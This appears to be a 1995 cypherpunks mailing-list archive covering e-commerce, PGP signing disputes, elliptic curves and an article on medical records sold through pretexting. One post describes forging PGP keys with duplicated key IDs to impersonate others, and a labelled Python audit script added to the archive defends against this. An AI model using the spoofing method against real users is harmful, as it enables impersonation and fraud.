In the United States alone, over 50 % of all companies are exchanging data electronically while engaging in accounting, controlling, production management, funds transfer, record-keeping, purchasing and selling activities. Consumers too use various information technologies daily to buy products via their credit cards, to transfer funds, to buy stocks, and to browse through electronic catalogues. We are entering a new era in electronic commerce characterized by firms and customers conducting business on the Internet spontaneously, on a 24-hour basis and worldwide. With the phenomenal growth of the Internet a unique and new electronic market place is evolving. Various estimates (ranging from 10 million to over one billion) have been advanced in terms of the total number of people who will be connected to computer networks as they expand to include telephones, televisions, computers, as well as a range of intelligent devices such as the 'market choice box'. Electronic commerce is expected to grow in various forms such as electronic data interchange and various multimedia services such as interactive television and home shopping, multimedia kiosks and cable-based video-on-demand services. Off-shoots may be desk-top video-conferencing and computer networks affecting the way we communicate and the overall need to travel. When overlaying and projecting many of these and future electronic commerce activities on the envisioned National and Global Information Highway, it is indeed astonishing to fathom the future potential for commerce and economic performance. At the same time, however, we can recognize potential social, organizational and societal limits and dysfunctions. How is the availability and use of the Internet changing commerce as we know it? Given many uncertainties, how can we reliably and empirically estimate the number of potential electronic commerce users on the Internet (in an effort to separate grounded analysis and projections from hype)? 
Will electronic markets provide new areas of opportunity for retailers, producers and consumers? How will future traffic on the Information Highway affect each segment of an industry value chain? How will such foreseeable developments impact the consumer and society in general? If electronic markets lower transaction costs for producers and retailers, will consumers gain by accessing manufacturers directly via market makers? What do electronic commerce developments mean from a marketing perspective and for customer relationships? What are the impacts of the emergence of widespread information technology use and worldwide electronic networks (e. g., the World Wide Web) on electronic commerce and markets in general? Can we envision electronic forms for payment such as digital cash on the Internet? What may be the potential impact of electronic cash on the economy, banks, and nations' equivalent of federal reserve systems? What is the role of government in electronic commerce developments and what policy directions ought to be addressed? This special issue intends to embrace a wide and rich array of electronic commerce issues. We would like to focus on "commerce," not just transactions, implying that commerce denotes a larger process including aspects of information seeking and distribution, negotiation, trust, risk-taking, customer relationships, buyers finding sellers, sellers finding customers, after-sale service and support. Although we are interested in transaction processing concerns within and between firms and within markets, we would also like to address important and essential social and behavioral issues in this setting, without which no effective commerce is possible. Moreover, we are interested in work and organizational issues embedded in electronic commerce and what they mean and imply inside the organization.
In addition, we would like to explore how these electronic commerce issues relate to the marketing perspective, such as in relationships between firms and customers/clients. _The Information Society_ journal, published since 1981, is a key forum for thoughtful analysis of the impacts, policies, system concepts, methodologies and cultural change related to trends that may be described as the "information technology revolution." It is a refereed journal publishing scholarly articles, position papers, short communications and book reviews. _The Information Society_ is a multidisciplinary journal whose audiences include policy- and decision-makers and scientists in government, industry and education; managers concerned with the effects of the information revolution on individuals, organizations and society; and scholars with an interest in the relationship between information technologies, social/organizational life, and social change. A general description of the journal can be found at the following URL: http://www.ics.uci.edu/~kling/tis.html For this special issue on "Electronic Commerce" and, in general, _The Information Society_ is interested in provocative analytical articles or empirical studies that are written to advance our understanding of the relationships among information technology, related social practices and policies, and social change. _TIS_ articles are typically 4,000 to 6,000 words long, and are written vividly with coherent analyses and minimal jargon. For manuscript format details, look at the following URL: http://www.ics.uci.edu/~kling/tisinst.html You may also contact the editor or see the inside back cover of an issue of the journal. Authors of manuscripts for this issue on "Electronic Commerce" should send four copies to the guest editor no later than January 15, 1996: Rolf T. Wigand, Ph. D. 
Guest Editor, _TIS_ School of Information Studies 4-293 Center for Science and Technology Syracuse University Syracuse, NY 13244-4100, USA Telephone: +315-443-5608; Fax: +315-443-5806 E-Mail: rwigand at syr.edu --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From anonymous-remailer at shell.portal.com Sun Nov 26 13:17:52 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 27 Nov 1995 05:17:52 +0800 Subject: Cypherpunk Certification Authority Message-ID: <199511262109.NAA29631@jobe.shell.portal.com> On Sun, 26 Nov 1995, Robert Hettinga wrote: > >Is this another one of those LD tentacles? ;) > > Must that or a spoof of some kind... "She" didn't sign it, and "she" claims > to have issued a signature... I have never signed any of my posts to this mailing list and frankly have no intention of beginning at this point. No matter what some spoofer posts, as my "key". Whoever the dolt was who posted the "pgp key" hopefully will begin to use it and produce something worthy of their "signing". I always thought that my words spoke for themselves. I really don't have the inclination to travel to a secured facility and to use a secured machine in order to reply to a message on this list, and I truly am not interested in issuing a new key on a daily basis. That is reserved for something of some importance. Frankly, this is really not worth it. As some people might have noticed, I've simply closed off this communications channel. There really is nothing left to say at this point. Or as some people might learn, "Lilies that fester, smell far worse than weeds." I think that was a line from a sonnet or something ... 
not that it would refer to anything in particular, or anything. > Cheers, > Bob Hettinga Alice de 'nonymous ... ...just another one of those... ...hunters... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From perry at piermont.com Sun Nov 26 13:28:06 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 27 Nov 1995 05:28:06 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: <199511262109.NAA29631@jobe.shell.portal.com> Message-ID: <199511262120.QAA07595@jekyll.piermont.com> Someone spoofing Alice, who is either Detweiler or "Dr." Cohen, says: > I have never signed any of my posts to this mailing list and frankly have > no intention of beginning at this point. Well, signed Alice posts have shown up, so we will just have to assume that the above was a spoof and that the signed Alice posts are the real ones, now won't we? Perry From anonymous-remailer at shell.portal.com Sun Nov 26 13:43:14 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 27 Nov 1995 05:43:14 +0800 Subject: Junk E-Mail - Part 4 Message-ID: <199511262133.NAA01459@jobe.shell.portal.com> On Thu, 23 Nov 1995, James M. Cobb wrote: > BRUSSELS/LONDON - SELLING - A ban on telephone "cold > calling" throughout the European Union was on Tuesday > approved by Euro-MPs, to the consternation of direct > marketing and distance selling organisations. In a move > designed to spare people from what MEPs consider to be > irritating telephone calls, a key parliamentary committee > voted to make prior consent from consumers obligatory > before a seller can approach them by telephone. > > The proposed ban also applies to communications by > e-mail, raising fears among publishing organisations that > the development of the information society in Europe could > be damaged. I think that there are significantly different standards and expectations outside the borders of the United States, than inside. 
Can you imagine the unmitigated "gall" of Euro-MPs in protecting the public rather than caving in to direct marketing special interest groups?? Goodness ... how archaic. The next thing those Europeans are going to do is something really strange and un-American, like having television commercials broadcast in between TV programs -- broadcast only after a show is over. Finished. Those Europeans just might not allow commercials to be woven in between scenes of a 20-minute sitcom. They might say, before and after ... and that's it. I mean this idea that advertising is "pollution" might start to catch on in certain European quarters. > Ban fear, for we have nothing to fear but fear itself. Heavens, no. Than again, I'm waiting for the day that the NY Times allows advertising on its op-ed page. Or for that matter the Washington Post in its online edition. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From nanomius at netcom.com Sun Nov 26 13:43:44 1995 From: nanomius at netcom.com (Albert Nanomius) Date: Mon, 27 Nov 1995 05:43:44 +0800 Subject: No Subject Message-ID: <199511262132.NAA05593@netcom6.netcom.com> ------- Forwarded Message From: "LadyNada" To: snet-l at world.std.com Date: Sun, 26 Nov 1995 13:26:39 +0000 Subject: Post Office to approve some internet email - -- Area : AEN NEWS -----------------------------------------( M-BOARD.SU1 )---- Msg# 22280 Date: 11-18-95 19:01 From: jared at alaska.net Read: No Replied: No To: All Mark: Subj: Oh, great. The Post Office is going to certify Internet mail. 
- ------------------------------------------------------------------------------- From: "Jared Armstrong" Originally to: news at aen.org Original Date: Sat, 18 Nov 95 18:47 EST http://techweb.cmp.com/techweb/ia/18issue/18post.html > [Image] > Post Office offers Internet digital ID > Certification authority a key enabler of electronic commerce > By Gail Bronson > Side bar WASHINGTON - Come next summer, the U.S. Postal Service > expects to be up and running with a service that will identify > senders and receivers of Internet messages, a critical enabler of > electronic commerce. > Specifically, the Postal Service will operate a certification > authority for public-key certificates used to digitally sign > messages transmitted over the Internet. > The Postal Service expects the service to be of particular interest > to anyone involved in electronic commerce or electronic data > interchange, in which the ability to assure the identity of both > the sender and receiver of information can be crucial. > "Right now there is no way to figure out if messages on the > Internet have been tampered with nor is there any way to > authenticate the genuine identity of a sender," said Paul Raines, > program manager for electronic commerce at the Postal Service. "It > could be a dog on the other end of the Internet now for all you > know." > Limited beta tests of the Postal Service's system already are under > way within the federal government, at the Federal Aviation > Administration, Social Security and the Internal Revenue Service. > "We're eager to work with VeriSign [RSA Data Security Inc. > spin-off] and any other certification authorities to come up with > ways to help with cross certification," Raines said. "We're not in > this to compete with private companies, rather, we're trying to > enable [the electronic commerce] industry." 
> Some users may find the Postal Service certification authority > service more appealing than private alternatives because its > service will carry the weight of law - tampering with Internet > messages would be as much a crime as tampering with regular U.S. > mail. On the other hand, there is always the lingering concern of > having to deal with a federal bureaucracy. > The Postal Service intends to play two roles in the certification > business. > First, as a certifying service the federal agency will provide the > code, or public-key certificate, necessary for recipients of > digitally signed messages to identify the sender. This service will > be necessary to decrypt mail unless the two correspondents > previously exchanged their keys privately. Second, the Postal > Service will maintain a server to manage a public register of > public-key certificates accessible off the Internet, Raines said. > The Postal Service will conduct market studies to gauge demand > before deciding how much individuals must pay to obtain someone > else's public key certificate. In addition, the Postal Service will > sell for less than a dollar an electronic date-time stamp to prove > the existence of a message in a particular point in time. > "We're taking the same attributes of hard copy that make them > legally binding and transferring them to electronic > correspondence," Raines said. > The Postal Service is working with several companies, including > Premenos Corp., to develop the necessary software, Raines said. The > user agent and interface specifications for designing software to > interface with the Postal Service's server, however, are available > free to any one willing to sign a licensing agreement, Raines said. > Regardless of how such arrangements work themselves out, the Postal > Service intends to operate this business on a nonprofit, > self-supported basis. "We don't intend to have first-class mail > supporting Internet mail," Raines said. 
> Back to Current Issue ______________________________________________________ Jared Armstrong Anchorage, Alaska, USA Last Free Place On Earth jared at alaska.net http://www.alaska.net/~jared For PGP Key, Send E-Mail With Subject:Get PGP Key ______________________________________________________ PGP Key ID E2B22AD1 PGP Fingerprint 38 C7 58 C0 C3 10 E0 9D 51 B2 F4 FA 76 04 47 87 ______________________________________________________ ______________________________________________________ - --- Reply to: news at aen.org * Origin: AEN NEWS Internet Gateway (1:231/110.1) ------- End of Forwarded Message From anonymous-remailer at shell.portal.com Sun Nov 26 13:59:00 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 27 Nov 1995 05:59:00 +0800 Subject: key for Alice as promised (not) Message-ID: <199511262145.NAA02219@jobe.shell.portal.com> On Wed, 22 Nov 1995 anonymous-remailer at shell.portal.com wrote: > > As an incentive for Alice to generate herself a PGP key, I hereby > > place Alice on notice that if she doesn't sign her next post, and > > provide a PGP key, I will create one for her, and steal all the > > postive (?) reputation that she has developed so far. Positive reputation?? Me?? Uhhm, thanks, I guess. > > You have 24 hours Alice, otherwise a key gets posted to here, and to > > the keyservers with your nym on it. > > Well 24 hours have passed, and Alice remains unrepentant: Can you imagine?? I'm simply not willing to fool myself into thinking that I have security by posting a key and using PGP. I think that's irresponsible. Unless, I have a secure machine dedicated to PGP *which I don't* I don't fool myself into thinking that I have any security, at all. > On Tue, 21 Nov 1995, the old Alice de 'nonymous wrote: > > > Alice here ... > > > > No, *I* am the real Alice, and I refuse to use PGP signing. Yep ... that's right. 
> So here we go Alice's key: > > Type bits/keyID Date User ID > pub 1024/23292ED1 1995/11/22 Alice de 'nonymous > Key fingerprint = CA 76 81 41 54 CE E7 D6 62 EE 6D 65 EE FB A3 55 Gee, it might even help if you got the address right. Since when is the list address, my address?? cypherpunks at toad.com?? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From black at eng.usf.edu Sun Nov 26 14:02:32 1995 From: black at eng.usf.edu (James Black) Date: Mon, 27 Nov 1995 06:02:32 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: <199511260953.BAA10105@jobe.shell.portal.com> Message-ID: Hello, On Sun, 26 Nov 1995 anonymous-remailer at shell.portal.com wrote: > > Its an excellent paper, well worth reading, but the basic > > problem is that X.509 encrypts before signing. > > You'd rather sign before encryption?? > > Doesn't that give you "known plain-text" to attack? i.e. the signature. > > I'm not sure whether it would or wouldn't, but I'm sure some > cryptographers here might clear that up mighty quick -- before any more > harm is allowed, I mean. The paper suggested that you have two different keys, one for encryption and the other for signatures, and you don't mix the two up, so that way you are protecting yourself from someone forging your signature, but you are not letting them know what your private key is. Make sense? I would suggest that you read the paper, as it is really an excellent document. 
========================================================================== James Black (Comp Sci/Comp Eng sophomore) e-mail: black at eng.usf.edu http://www.eng.usf.edu/~black/index.html ************************************************************************** From nobody at REPLAY.COM Sun Nov 26 14:06:33 1995 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 27 Nov 1995 06:06:33 +0800 Subject: Junk E-Mail - Part 4 Message-ID: <199511262156.WAA27898@utopia.hacktic.nl> Alice: >Heavens, no. Than again, I'm waiting for the day that the NY Times >allows advertising on its op-ed page. It does and has for years and years, every day. Maybe you meant the editorial page? From norm at netcom.com Sun Nov 26 15:24:46 1995 From: norm at netcom.com (Norman Hardy) Date: Mon, 27 Nov 1995 07:24:46 +0800 Subject: Elliptic curves, current status? Message-ID: At 12:07 PM 11/25/95, James A. Donald wrote: .... >Can someone tell me the true story? Not with any assurance. I don't trust my own knowledge yet. I think that the opinion is that the discrete log problem is harder with elliptic curves than for prime modulus arithmetic for numbers of a given size. That is why you can use fewer bits. The inner loop in some elliptic curve systems is not multiply-add (as is the case with number fields) but other operations that are as efficient with gates but less efficient with normal machine instructions. There are probably an order of magnitude more people that have studied and published about the problems of breaking prime modulus crypto than elliptic curves. Perhaps progress will be faster should elliptic curves be studied by more people. There are a lot of tricks to speed up discrete logs in for prime modulus schemes that don't seem to work for elliptic curves. There are many parameters to an elliptic curve crypto system. I haven't seen any taxonomy of which kinds are good and which have been shown to be weak. 
In contrast there seems to be a consensus about how to pick primes for RSA or Diffie-Hellman. I am certainly no expert. Perhaps this will prompt comments from someone who can point to real information. From EALLENSMITH at ocelot.Rutgers.EDU Sun Nov 26 15:35:26 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Mon, 27 Nov 1995 07:35:26 +0800 Subject: Cyberangels Message-ID: <01HY3X9A4V748WYKSR@mbcl.rutgers.edu> Some may have already seen this, but the Guardian Angels are trying to intrude onto the net... and are doing so in typical clueless newbie fashion. See the CUDigest web site for more information; the links to the most significant issues are: http://www.soci.niu.edu/~cudigest/CUDS7/cud786 and http://www.soci.niu.edu/~cudigest/CUDS7/cud791. Some interesting commentary is also in http://www.soci.niu.edu/~cudigest/CUDS7/cud787. Incidentally, one way in which they are displaying cluelessness is in taking L.Detweiler seriously. -Allen From Greg_Rose at sydney.sterling.com Sun Nov 26 17:37:52 1995 From: Greg_Rose at sydney.sterling.com (Greg Rose) Date: Mon, 27 Nov 1995 09:37:52 +0800 Subject: establishing trust In-Reply-To: <199511240500.AAA07836@clark.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Carl Ellison wrote: Ed Carp wrote: >Subject: Re: crypto for porno users >To: khijol!clark.net!cme at uunet.uu.net (Carl Ellison) >Date: Thu, 23 Nov 1995 15:57:17 -0600 (CST) >Cc: khijol!got.net!edge at uunet.uu.net, khijol!toad.com!cypherpunks at uunet.uu.net > >totally different from this "web of trust" I keep hearing about - and that is >*it*. Do you trust me any more now than before I started signing my postings? Actually, in my view, signed postings are the first step. With those (and the right S/W (not there yet)), I get to know that a bunch of postings came from the same person. I even know who they came from: the person who is capable of signing with key 0xXXXXXXXX. I hate to point this out, but that isn't true. 
Anyone can create a key with any chosen keyid and attach the same publicly known name to it. (see, eg., the key I signed this with, given below). The only unforgeable things about a particular key are: 1. The key itself (you know, the product of the primes), 2. The key fingerprint (unless MD5 is compromised) and 3. The web of trust leading to that key. So, in practice, you actually have to look at the key fingerprint of the key used to sign a message, if you want to be sure of the uniqueness of that key. Or you have to only trust keys that come well-introduced. Back to the Web of Trust. Since the only way I have of getting to know the person is through those postings, I get to know that person and through that knowledge I decide whether or not to trust. I've been trying to think of the possible ramifications of spoofing people's names and keyids on a large scale. And a large scale is certainly possible -- it only took me about an hour to create this key. I was originally intending to use this key as part of a real project, to gain attention to the project, but the more I thought about it the more I worried about the implications. This "coming out" invalidates any chance of that happening. There are two bad things I can think of. Suppose I want to somehow attack Fred. I can create a key with the same ascii text associated with it very easily. With only a little more effort, I can also duplicate the keyid. PGP adds new keys at the front of the keyring, so if I start distributing this new key widely, it will appear in keyrings before the "real" Fred's. Whenever this happens automatically, there is some possibility that the wrong key will be used for some operations. PGP doesn't help much, because it is hard to specify the key unambiguously in this case. PGP uses more than just the visible part of the keyID. So at least it will choose the right key to verify signatures, right? Maybe not. 
I can apply the same spoofing technique to the whole internal keyID, and generated a key that even PGP can't tell is the wrong one. I think that when PGP tried to check the signature on a message from the "real" Fred that it would notice that it had applied the wrong key, but I'm not absolutely sure on this point. Anyway, an inattentive or somewhat automated user will merely notice that the document signature fails to check out, essentially slurring the "real" Fred's reputation. Any other possible attacks? Greg. Greg Rose INTERNET: greg_rose at sydney.sterling.com Sterling Software VOICE: +61-2-9975 4777 FAX: +61-2-9975 2921 28 Rodborough Rd. http://www.sydney.sterling.com:8080/~ggr/ French's Forest 35 0A 79 7D 5E 21 8D 47 E3 53 75 66 AC FB D9 45 NSW 2086 Australia. co-mod sci.crypt.research, USENIX Director. -----BEGIN PGP SIGNATURE----- Version: 2.6.2i -----END PGP SIGNATURE----- -----BEGIN PGP MESSAGE----- Version: 2.6.2i -----END PGP MESSAGE-----
From ilaccr at sol.racsa.co.cr Sun Nov 26 18:32:39 1995 From: ilaccr at sol.racsa.co.cr (Instituto Latinoamericano de Computacion) Date: Mon, 27 Nov 1995 10:32:39 +0800 Subject: No Subject Message-ID: <9511261423.AA01203@sol.racsa.co.cr> Hey What's up,my name is Herbert Salas,I live in Costa Rica,I would like to know everything you can about hacking.I've tried to find here something,but I can't find anything here,how they do to encrypt things,and how can you crack it,what do I need,Software,Hardware,Where can I get it.??Help. Thanks. Herbert Salas From nobody at REPLAY.COM Sun Nov 26 19:52:36 1995 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 27 Nov 1995 11:52:36 +0800 Subject: For sale: your secret medical records Message-ID: <199511270120.CAA06893@utopia.hacktic.nl> The Sunday Times, Top page one, 26 Nov 1995 For sale: your secret medical records for L150 by Lois Rogers and David Leppard Confidential medical records of politicians, celebrities and millions of other National Health Service patients can be bought on the information black market for L150. The contents of the files comprising patients' most personal health details dating back 30 years, are being sold to order by high-street detective agencies advertising in the Yellow Pages. The Sunday Times has discovered that GP practices across Britain are failing to safeguard files which contain sexual, mental and physical histories of patients. Files on sale last week revealed how named patients had vasectomy operations, or had a family history of Alzheimer's disease and precancerous growths. They also included the type and dose of medication prescribed, visits to casualty units, and injuries suffered in road accidents. The disclosures have prompted calls by opposition MPs and doctors' leaders for urgent laws to protect the security of the health records of Britain's 56.5m patients. 
Alan Milburn, a Labour health spokesman, said he would be asking Stephen Dorrell, the health secretary, to conduct an urgent inquiry. "This is a violation of the special relationship between doctors and their patients," said Milburn. "I find it disturbing and deeply sinister. Patients will be horrified to learn that their records can be accessed by unknown organisations." Alex Carlisle, the Liberal Democrat home affairs spokesman and a lay member of the General Medical Council, said: "It is ethically and morally outrageous that organisations of any kind should obtain details like that without consent. It is contrary to everything we are told about the confidentiality of medical records. This should be a crime punishable by imprisonment." Milburn and Carlile were among more than a dozen people who last week allowed The Sunday Times to expose the security failures in the NHS records system by giving the newspaper permission to access their confidential files through commercial agencies. The problem first came to light when one agency said it was receiving more and more commissions from big employers who wanted it to carry discreet checks on the medical backgrounds of their employees. The agencies, many of which advertise "private searches" in the Yellow Pages, offer their services for fees ranging from L150 to L800. They offer to provide a written summary of anybody's complete medical files within three hours. All they require is the name, address and date of birth of the patient they are investigating. They are thought to be able to obtain the records by impersonating medical staff and persuading them to disclose contents of the NHS files over the telephone. Last week a Sunday Times reporter posing as a prospective client contacted 10 private detective agencies chosen at random from the Yellow Pages. "Most of this stuff is on manual records," said one employee of a London agency. "It is pretty well protected. 
We're not officially allowed [to do this] but it's perfectly possible." A second private investigator said: "It's just a question of knowing who and what to ask." However, most declined to discuss the methods they used. "What we are doing is illegal, and I'm not going into the details over the telephone," said another agent in Robertsbridge, East Sussex. Dr Sandy Macara, chairman of the British Medical Association council, which represents 105,000 doctors, was among those who agreed to take part in the exercise. Details of his medical and surgical history were provided after a brief telephone call by a reporter to a private agency. The information was faxed to the newspaper within three hours, after a price of L150 was quoted. "This is incredible. I cannot imagine how they have got this information," Macara said. The ease with which the health files could be obtained posed a threat to the Electronic Patients' Records, a new computer database which will soon contain the files of all NHS patients in England and Wales, Macara said. "We will have to ensure the new nationwide computer network is as secure as humanly possible, and press for a statutory right to confidentiality of patient information." Elizabeth France, the data protection registrar, said the Criminal Justice Act had recently tightened the law regarding information obtained by deception. But the penalties apply only to information held on computer, rather than medical notes, which at present are held mainly on hand-written files. "This is something we take very seriously," France said. "We are actively pursuing it. It doesn't mean the problems have been solved." John Wadham, director of Liberty, the civil rights group, called on the government to introduce a new criminal offence of obtaining information by deception. "Such information can obviously include material about sexually transmitted diseases and material about an individual's physical and mental health," he said. 
"There clearly needs to be a right to privacy so the courts can act against this." Baroness Cumberlege, the junior health minister, said confidentiality remained a cornerstone of the NHS. "We are about to issue strengthened guidelines for security of records within hospitals and new measures for unauthorised access from external sources," she said. "We are having discussions with the BMA and the Data Protection Agency specifically about these issues." ----- From anonymous-remailer at shell.portal.com Sun Nov 26 20:15:05 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 27 Nov 1995 12:15:05 +0800 Subject: MED_vac Message-ID: <199511270405.UAA04239@jobe.shell.portal.com> On Thu, 16 Nov 1995, Adam Shostack wrote: > If you have some personal data that includes your patient > number, why not have a card that instead lists your important data? > "This patient is diabetic, allergic to amoxicillin, and has Gold Cross > insurance." I'm confused. Are you saying that the answer is hardware?? Why I think someone already thought of that. It's called a MEDIC-ALERT bracelet. As someone whose blood type is rare, I can appreciate this. > At Defcon, Bruce Schneier was talking about the value stored > in casino chips. It's staggering. It's an alternate cash system, with > a huge float, astounding velocity, and very little fraud. Transaction > costs are low, clearing is instantaneous. The comparison is fairly > clear. I don't see the comparison. High value "chips" have additional security precautions engineered into them, over and above low-value chips, hopefully Schneier realizes this. There are also regular "counts", in fact perpetual "counts" in all casinos. I mean pit bosses and managers have to do something to earn their keep. (other than handing out comps, I mean.) There's also an "eye in the sky" lording over you in a casino, and the "chips" aren't actually "cleared" until you cashout. 
I'm not sure how Schneier got the idea that it was instantaneous clearing, but it isn't by any stretch of the imagination. But then what do I know ... I don't even sign my posts with PGP. > | So, what if my records were available on the net, but encrypted with a > | an key known to my physician and an escrow agency? (Equivalently, they > | could be on that smartcard, but encrypted.) If an emergency occurs, the > | hospital fetches my encrypted records from my physician's server, then > | sends a message (signed with the hospital's key) to Keys R Us, the escrow > | agent, saying "This is Dr. McCoy at Frobnitz Memorial Hospital, we need the > | key for FooBar Medix, Inc., patient number 147258369." (My FooBar Medix, > | Inc., insurance card lists my physician's server, the escrow agency, and my Why bother with having records on the "Net". What if the net goes down, then what?? Where are you left then? Relying on technology, simply because something CAN be done is very bad practice, when its not needed. When I travelled in the States, I simply kept a copy of my travel documents in my wallet. I never had any problem. And I had a copy of my pertinent medical data, attached via a MEDIC-ALERT bracelet to my body. Then again, the amount of information that you want a doctor reading over when you do have an emergency is minimal. You really want the doctor to act, not to get to know all of the details which aren't relevant to your treatment. There's no need to overload someone, you simply have to give someone the resources they need in order to get the job done. And that is the critical point, isn't it?? Getting the job done, and giving someone what's needed to do so. > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. 
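The key ID ambiguity raised in Greg Rose's "establishing trust" message earlier in this archive can be checked for mechanically. The following is an added example, not code from any poster or from PGP itself: it audits a keyring for a PGP 2.x-style key ID or user ID that maps to more than one MD5 fingerprint, and labels a signer only from a locally pinned fingerprint. The keyring entries, the pin table and every function name are constructed for illustration; the moduli are plain integers standing in for RSA moduli.

```python
import hashlib
from collections import defaultdict


def mpi_body(x):
    """Big-endian bytes of an integer, without the 2-byte MPI length prefix."""
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


def key_id64(n):
    """PGP 2.x (version 3 key) key ID: the low 64 bits of the RSA modulus."""
    return "%016X" % (n & 0xFFFFFFFFFFFFFFFF)


def short_id(n):
    """The 32-bit form that PGP 2.x displays to the user."""
    return "%08X" % (n & 0xFFFFFFFF)


def fingerprint(n, e):
    """Version 3 fingerprint: MD5 over modulus bytes followed by exponent bytes."""
    return hashlib.md5(mpi_body(n) + mpi_body(e)).hexdigest().upper()


def audit_keyring(keyring):
    """Return every key ID or user ID that maps to more than one fingerprint.

    keyring is a list of (user_id, modulus, exponent) tuples. The result maps
    ("keyid", id) or ("userid", name) to the sorted list of fingerprints that
    share that label, i.e. the labels that cannot identify a key on their own.
    """
    seen = defaultdict(set)
    for user_id, n, e in keyring:
        fp = fingerprint(n, e)
        seen[("keyid", key_id64(n))].add(fp)
        seen[("userid", user_id)].add(fp)
    return {label: sorted(fps) for label, fps in seen.items() if len(fps) > 1}


def label_signer(n, e, pins):
    """Name a signer only from the local pin table, keyed by full fingerprint.

    Returns the locally assigned alias, or None when the key is not pinned,
    whatever user ID or key ID the key itself carries.
    """
    return pins.get(fingerprint(n, e))


# Constructed sample data: integers standing in for 1024-bit moduli.
LOW64 = 0x0123456789ABCDEF
N_FRED = (1 << 1023) | (0x1111 << 64) | LOW64
N_LOOKALIKE = (1 << 1023) | (0x2222 << 64) | LOW64   # same low 64 bits
N_CAROL = (1 << 1023) | (0x3333 << 64) | 0x0FEDCBA987654321
E = 17

KEYRING = [
    ("Fred <fred@example.org>", N_LOOKALIKE, E),   # added later, listed first
    ("Fred <fred@example.org>", N_FRED, E),
    ("Carol <carol@example.org>", N_CAROL, E),
]

# Local alias table: the fingerprint was confirmed out of band (assumption).
PINS = {fingerprint(N_FRED, E): "fred (fingerprint confirmed in person)"}


if __name__ == "__main__":
    for (kind, label), fps in sorted(audit_keyring(KEYRING).items()):
        print("ambiguous %s %s:" % (kind, label))
        for fp in fps:
            print("    " + fp)
    for name, n, e in KEYRING:
        print(short_id(n), name, "->", label_signer(n, e, PINS))
```

Both "Fred" entries display the same user ID and the same key ID, yet only the pinned fingerprint resolves to a local alias.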
From weidai at eskimo.com Sun Nov 26 21:59:37 1995 From: weidai at eskimo.com (Wei Dai) Date: Mon, 27 Nov 1995 13:59:37 +0800 Subject: Elliptic curves, current status? In-Reply-To: Message-ID: On Sun, 26 Nov 1995, Norman Hardy wrote: > There are many parameters to an elliptic curve crypto system. > I haven't seen any taxonomy of which kinds are good and which > have been shown to be week. In contrast there seems to be a > consensus about how to pick primes for RSA or Diffie-Hellman. The IEEE p1363 group's working draft on elliptic curve standard may help you here. You can find it at ftp://ftp.rsa.com/pub/p1363/draft/ec.ps One reason for confusion about the speed of elliptic curve cryptosystems is the small number of implementations. A paper in Crypto 95 claimed that for doing key exchange, an elliptic curve algorithm takes about the same time and has about the same level of security as DH with 512 bit modulus, and that elliptic curve has a speed advantage if greater security is desired. Wei Dai From cme at clark.net Sun Nov 26 22:20:13 1995 From: cme at clark.net (cme at clark.net) Date: Mon, 27 Nov 1995 14:20:13 +0800 Subject: establishing trust Message-ID: <199511270516.AAA05126@clark.net> Greg, >Subject: Re: establishing trust >Date: Mon, 27 Nov 95 12:20:47 +1000 > >-----BEGIN PGP SIGNED MESSAGE----- Did you intentionally not provide the same key that this was signed with? I added the key you provided, but PGP still couldn't find the right key for this signature. > from the same person. I even know who they came from: the person who > is capable of signing with key 0xXXXXXXXX. > >I hate to point this out, but that isn't true. >Anyone can create a key with any chosen keyid and >attach the same publicly known name to it. Of course -- sloppiness on my part -- trying to minimize my own typing. Pardon me. 
One must use a hash of the key or the key itself to identify it -- not merely some portion of the modulus -- and the ID field has to be large enough to rule out a brute force search on the spoofer's part. The PGP KeyID problem has merely to do with PGP's own access mechanisms. Successful verification of a signature by some key is linkage enough to that key. If multiple messages/files verify by the same key, they are linked together no matter how the key is identified. The problem you identified comes from the fact that PGP doesn't let us know with enough certainty that the same key was used for two different signatures. In fact, PGP just tells you the UserID of the key which verified the signature -- as if that UserID were (a) unique and (b) meaningful. The keyID isn't displayed. For a version of PGP to suit my tastes, the unique UserID would be assigned by me alone -- and the file of those assignments (called "aliases" in TIS/MOSS) would be protected under my own signature (or, equivalently, encrypted under my own conventional key -- the same one protecting my private keys, perhaps). - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +---------------------------------------------- Jean Ellison (aka Mother) -+ From frantz at netcom.com Sun Nov 26 23:53:45 1995 From: frantz at netcom.com (Bill Frantz) Date: Mon, 27 Nov 1995 15:53:45 +0800 Subject: Bitbux could eliminate some domestic currencies? Message-ID: <199511270737.XAA20225@netcom16.netcom.com> At 12:21 11/23/95 -0800, John Gilmore wrote: >>From a letter in [My dog, I mean my software, ate this part of the msg -- gnu] >... >"The importance of e-money replacing cash is greater than possible effects >on exchange rates. 
